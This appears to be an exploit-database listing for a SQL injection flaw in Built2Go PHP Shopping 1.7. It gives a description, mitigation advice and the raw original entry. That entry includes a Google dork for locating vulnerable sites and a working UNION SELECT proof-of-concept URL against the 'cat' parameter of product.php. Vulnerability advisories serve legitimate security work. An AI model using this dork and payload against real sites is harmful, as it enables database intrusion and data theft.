header-logo
Suggest Exploit
vendor:
Built2Go PHP Shopping
by:
Br0ly
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Built2Go PHP Shopping
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:built2go:built2go_php_shopping
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Built2Go PHP Shopping <= 1.7

A SQL injection vulnerability was discovered in Built2Go PHP Shopping version <= 1.7. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable script. This can be done by sending a crafted URL to the vulnerable script, such as http://server.com/product.php?cat=[sqli]. This will allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks. Additionally, input validation should be performed to ensure that user-supplied data is valid and safe.
Source

Exploit-DB raw data:

Script Name: Built2Go PHP Shopping  ( version ) <= 1.7
Site: http://built2go.com/
Script Demo: http://demos.built2go.com/shopping/1/
Found: Br0ly
Google Dork: "Powered by Built2Go PHP Shopping"

p0c:

http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*

xPloit:

http://server.com/product.php?cat=[sqli]

Brazil ;D

Navigation

Suggest Exploit

Services By CQR